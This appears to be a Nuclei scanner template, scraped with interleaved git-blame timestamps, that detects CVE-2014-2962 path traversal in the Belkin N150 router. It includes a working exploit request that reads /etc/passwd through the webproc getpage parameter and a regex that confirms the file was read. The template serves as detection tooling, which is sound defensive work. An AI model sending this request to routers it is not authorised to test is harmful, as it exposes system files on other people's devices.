2021-07-25 23:58:58 +00:00
id : CVE-2014-2962
info :
2022-02-25 14:32:23 +00:00
name : Belkin N150 Router 1.00.08/1.00.09 - Path Traversal
2021-07-25 23:58:58 +00:00
author : daffainfo
severity : high
2022-02-25 14:32:23 +00:00
description : A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
2023-09-06 13:22:34 +00:00
remediation : Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
2022-02-25 14:32:23 +00:00
reference :
- https://www.kb.cert.org/vuls/id/774788
- https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
2022-05-17 09:18:12 +00:00
- http://www.kb.cert.org/vuls/id/774788
- http://www.belkin.com/us/support-article?articleNum=109400
2023-07-11 19:49:27 +00:00
- https://www.exploit-db.com/exploits/38488/
2022-02-25 14:32:23 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 7.8
2022-02-25 14:32:23 +00:00
cve-id : CVE-2014-2962
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.95825
2023-10-14 11:27:55 +00:00
epss-percentile : 0.9924
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : belkin
product : n150_f9k1009_firmware
tags : cve,cve2014,lfi,router,firmware,traversal
2021-07-25 23:58:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-25 23:58:58 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-25 23:58:58 +00:00
- type : status
status :
- 200